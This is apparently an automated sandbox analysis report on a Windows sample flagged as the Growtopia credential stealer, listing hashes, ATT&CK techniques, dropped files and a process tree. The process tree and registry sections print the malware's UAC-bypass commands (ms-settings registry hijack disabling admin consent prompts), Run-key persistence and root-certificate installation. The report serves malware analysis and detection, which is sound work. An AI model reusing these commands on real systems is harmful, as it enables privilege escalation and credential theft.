growtopia | 44d150b890d0d9440e430d47f2b5aeb2c6b5148bbe8cfabf83dcb4f89abdef2e

Analysis

max time kernel
117s
max time network
117s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
05-01-2025 16:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_af382cfb9632dde6f7de3f2d0a76e103.exe
Size

426KB
MD5

af382cfb9632dde6f7de3f2d0a76e103
SHA1

2ace18dcd993145b4367dbb13cc1b5e99c3eeaf0
SHA256

44d150b890d0d9440e430d47f2b5aeb2c6b5148bbe8cfabf83dcb4f89abdef2e
SHA512

4987935c732c974760b0de0d54bdef75ce0a75cf88d698e3014b974828f2d370576aa7dd79ac661f14141fd36b41e844f581a9808ea2f6eabfbc3ab5b7fba0cf
SSDEEP

6144:tYvr7D1PE/3BcL9l5bUsgFxvJqBIeAZtvHLPKKzAI17JY0H+kK1e:tGPD549FRaSkT1e

Score

10^/10

growtopia discovery execution persistence spyware stealer

Malware Config

Signatures

Growtopia
Growtopa is an opensource modular stealer written in C#.
stealer growtopia
Growtopia family
growtopia

Executes dropped EXE 1 IoCs

pid	Process
2804	Exafarm Loader.exe

Loads dropped DLL 3 IoCs

pid	Process
2344	WerFault.exe
2344	WerFault.exe
2344	WerFault.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Exafarm Loader = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Exafarm Loader"	Exafarm Loader.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	icanhazip.com

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
796	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2344	2804	WerFault.exe	30

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Exafarm Loader.exe

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\windows\\system32\\cmd.exe /c REG ADD HKLM\\software\\microsoft\\windows\\currentversion\\policies\\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute = " "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\ms-settings\shell\open\command	reg.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Exafarm Loader.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Exafarm Loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Exafarm Loader.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2616	powershell.exe
796	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	796	powershell.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 2244 wrote to memory of 2804	2244	JaffaCakes118_af382cfb9632dde6f7de3f2d0a76e103.exe	30
PID 2244 wrote to memory of 2804	2244	JaffaCakes118_af382cfb9632dde6f7de3f2d0a76e103.exe	30
PID 2244 wrote to memory of 2804	2244	JaffaCakes118_af382cfb9632dde6f7de3f2d0a76e103.exe	30
PID 2244 wrote to memory of 2804	2244	JaffaCakes118_af382cfb9632dde6f7de3f2d0a76e103.exe	30
PID 2804 wrote to memory of 2728	2804	Exafarm Loader.exe	31
PID 2804 wrote to memory of 2728	2804	Exafarm Loader.exe	31
PID 2804 wrote to memory of 2728	2804	Exafarm Loader.exe	31
PID 2804 wrote to memory of 2728	2804	Exafarm Loader.exe	31
PID 2728 wrote to memory of 2396	2728	cmd.exe	33
PID 2728 wrote to memory of 2396	2728	cmd.exe	33
PID 2728 wrote to memory of 2396	2728	cmd.exe	33
PID 2728 wrote to memory of 2956	2728	cmd.exe	34
PID 2728 wrote to memory of 2956	2728	cmd.exe	34
PID 2728 wrote to memory of 2956	2728	cmd.exe	34
PID 2804 wrote to memory of 2696	2804	Exafarm Loader.exe	35
PID 2804 wrote to memory of 2696	2804	Exafarm Loader.exe	35
PID 2804 wrote to memory of 2696	2804	Exafarm Loader.exe	35
PID 2804 wrote to memory of 2696	2804	Exafarm Loader.exe	35
PID 2804 wrote to memory of 2672	2804	Exafarm Loader.exe	37
PID 2804 wrote to memory of 2672	2804	Exafarm Loader.exe	37
PID 2804 wrote to memory of 2672	2804	Exafarm Loader.exe	37
PID 2804 wrote to memory of 2672	2804	Exafarm Loader.exe	37
PID 2672 wrote to memory of 2616	2672	cmd.exe	39
PID 2672 wrote to memory of 2616	2672	cmd.exe	39
PID 2672 wrote to memory of 2616	2672	cmd.exe	39
PID 2804 wrote to memory of 2816	2804	Exafarm Loader.exe	41
PID 2804 wrote to memory of 2816	2804	Exafarm Loader.exe	41
PID 2804 wrote to memory of 2816	2804	Exafarm Loader.exe	41
PID 2804 wrote to memory of 2816	2804	Exafarm Loader.exe	41
PID 2804 wrote to memory of 2188	2804	Exafarm Loader.exe	43
PID 2804 wrote to memory of 2188	2804	Exafarm Loader.exe	43
PID 2804 wrote to memory of 2188	2804	Exafarm Loader.exe	43
PID 2804 wrote to memory of 2188	2804	Exafarm Loader.exe	43
PID 2804 wrote to memory of 1960	2804	Exafarm Loader.exe	45
PID 2804 wrote to memory of 1960	2804	Exafarm Loader.exe	45
PID 2804 wrote to memory of 1960	2804	Exafarm Loader.exe	45
PID 2804 wrote to memory of 1960	2804	Exafarm Loader.exe	45
PID 1960 wrote to memory of 796	1960	cmd.exe	47
PID 1960 wrote to memory of 796	1960	cmd.exe	47
PID 1960 wrote to memory of 796	1960	cmd.exe	47
PID 2804 wrote to memory of 2260	2804	Exafarm Loader.exe	48
PID 2804 wrote to memory of 2260	2804	Exafarm Loader.exe	48
PID 2804 wrote to memory of 2260	2804	Exafarm Loader.exe	48
PID 2804 wrote to memory of 2260	2804	Exafarm Loader.exe	48
PID 2804 wrote to memory of 2344	2804	Exafarm Loader.exe	50
PID 2804 wrote to memory of 2344	2804	Exafarm Loader.exe	50
PID 2804 wrote to memory of 2344	2804	Exafarm Loader.exe	50
PID 2804 wrote to memory of 2344	2804	Exafarm Loader.exe	50

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_af382cfb9632dde6f7de3f2d0a76e103.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_af382cfb9632dde6f7de3f2d0a76e103.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2244
- C:\Users\Admin\AppData\Local\Temp\Exafarm Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Exafarm Loader.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:2804
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\UAC.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2728
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
      4⤵
      Modifies registry class
      PID:2396
  - - C:\Windows\system32\reg.exe
      REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
      4⤵
      Modifies registry class
      PID:2956
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DC.exe" /D
    3⤵
    PID:2696
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\MAC.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell get-NetAdapter
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2616
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\GenReg.exe" [29549]--[140496283]--[14774,14774c,14774w,14774wc]--[105372212,105372212c]
    3⤵
    PID:2816
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WBPVBat.bat"
    3⤵
    PID:2188
- - C:\Windows\system32\cmd.exe
    cmd.exe /c Powershell.exe -NoProfile -ExecutionPolicy unrestricted -file "C:\Users\Admin\AppData\Local\Temp\ZBRecoveredFolder\RecoverFiles.ps1"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell.exe -NoProfile -ExecutionPolicy unrestricted -file "C:\Users\Admin\AppData\Local\Temp\ZBRecoveredFolder\RecoverFiles.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:796
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ScanPC.bat"
    3⤵
    PID:2260
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 1516
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:2344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Cab47CC.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Exafarm Loader.exe

Filesize
151KB

MD5
a5649742d25bd68b1db70b70b3012d50

SHA1
469f0f58b70db096c8e0ecc30252d26fe274ff76

SHA256
f2adef7d44afd81ae29ff66853f7db11c5959d22439cd623291638dc657fca38

SHA512
b5db014aab517a28959562bde768c375805cdff9a1f241460da849e0637dfafe88d4c7dc9129e7c63b651a3a8bbd6b9721d47c8a53182f1151893f419aac0a71

Download Submit
C:\Users\Admin\AppData\Local\Temp\MAC.bat

Filesize
42B

MD5
56120ea7d97e691243935b98d32f4b65

SHA1
f89f6249a946882410de06765ec07e11f2608177

SHA256
1d6a29ec8b4f624b3246450c2a34ae1a8b3e35cdc7f3fa86a680e14169e01a67

SHA512
4cda70d6283fc48105a64c157c50fbe61bc5c77aa0f28e8c1176943cfdfa4345df77f09573d49ff896830cfc8315547a453a7bcbe68c00dd140b99ead94c8b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\MAC.zb

Filesize
423B

MD5
dfd4ca0036d729b95ec5a67081801628

SHA1
d213288411a38c9b60b606321e5617180805a7c3

SHA256
663431f49b93a7cc72370896bb20920edae4764b1fac6da2c31717c0ebdfd1e4

SHA512
c844edabab2dac76b0ee6f3203dca97a9009443df3466621616e2536570c1be04177e5080d83330440d2e4b6b58de604d93f040fb49cd109e4849fcc383a5316

Download Submit
C:\Users\Admin\AppData\Local\Temp\ScanPC.bat

Filesize
65B

MD5
fe76c9e647f358368eaf4e222e204dc6

SHA1
c94ea01f006620f2adedf56a377ad452b30be98a

SHA256
46aa77e7b80cab973f35033380be8dd8924bc7a5f43990037359809baf628244

SHA512
fd1b4fe5bc64813614a847d9552d4e29a9ec9957f4e7a94176d65298293412213f0255400bf55d188a4a159575d611a072fce999e2253adf0be8f382af977daa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar484B.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\UAC.bat

Filesize
351B

MD5
84e809c3854f97339e11bb74129f69d1

SHA1
63e45ca731eeb00cbbd89b8870c1cdeeaf6c8ef0

SHA256
c9db5db63e80c488a96460c775e88a7208e6ca278f14128a1267d4d6f3f3187c

SHA512
e8d313fc47f247770e3c346c7a9fe13902e80f1e2a37e08a46a7c0a3026cc3939a84a321f90d09b5aa9f6e7aa0dc799d86bc58e417e8bd4e197d5b62d23dacc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\WBPVBat.bat

Filesize
45B

MD5
8f6fe19e0609ab1352a0789cc2f26930

SHA1
0e03b9c99795d0edece5b885211d142e21df56bc

SHA256
390d8088e112cd92ed0f9be3ac1cc127e6cdf482d0b7546ec869c73d85a6d682

SHA512
d4fce506abdb0c25564a99b1d49e067197d61b2fc43fcc7bb063d1fc084cc1591162ae8a3c20c78558bb0543ea892323aacc4d609658ea1593f936f1ff13b17a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZBRecoveredFolder\RecoverFiles.ps1

Filesize
253B

MD5
c2a812a536121ead50a97e6dca817b19

SHA1
d56a1b38c4161f03e01bc95e3d5172c1b54b6143

SHA256
e73f61c7505305910b75d1794b43b1d3030034459e2cb0e723d4f3b16384554e

SHA512
bab9271abc4e6da9c7c3aba74ec59e98d4325888235d1e364045ddaeef5aec42342ef4683a4541019f7190af160f555d673e9924ab8daf09b8816350b4d2ce46

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
94f5485258d47565e9bf1a4fd2ecb4e8

SHA1
08ff204548b3efca75458388c0cfbbe8c4564f02

SHA256
efeea6045eaa4b1572cab3b7543ea32eccde752f2995f91e644e96ba0db61266

SHA512
3921371177395fe4f5617dbab3602134a4b28510cc48a4b84a4438863bfdb714952c8308a2fc27f2ce21b0ccbd76b3d84fe1f0cff99e83cb7ac25a50f28372ec

Download Submit
memory/796-92-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download
memory/796-93-0x00000000027D0000-0x00000000027D8000-memory.dmp

Filesize
32KB

Download
memory/2244-0-0x000007FEF5E23000-0x000007FEF5E24000-memory.dmp

Filesize
4KB

Download
memory/2244-1-0x0000000000180000-0x00000000001F0000-memory.dmp

Filesize
448KB

Download
memory/2616-80-0x00000000023D0000-0x00000000023D8000-memory.dmp

Filesize
32KB

Download
memory/2616-79-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download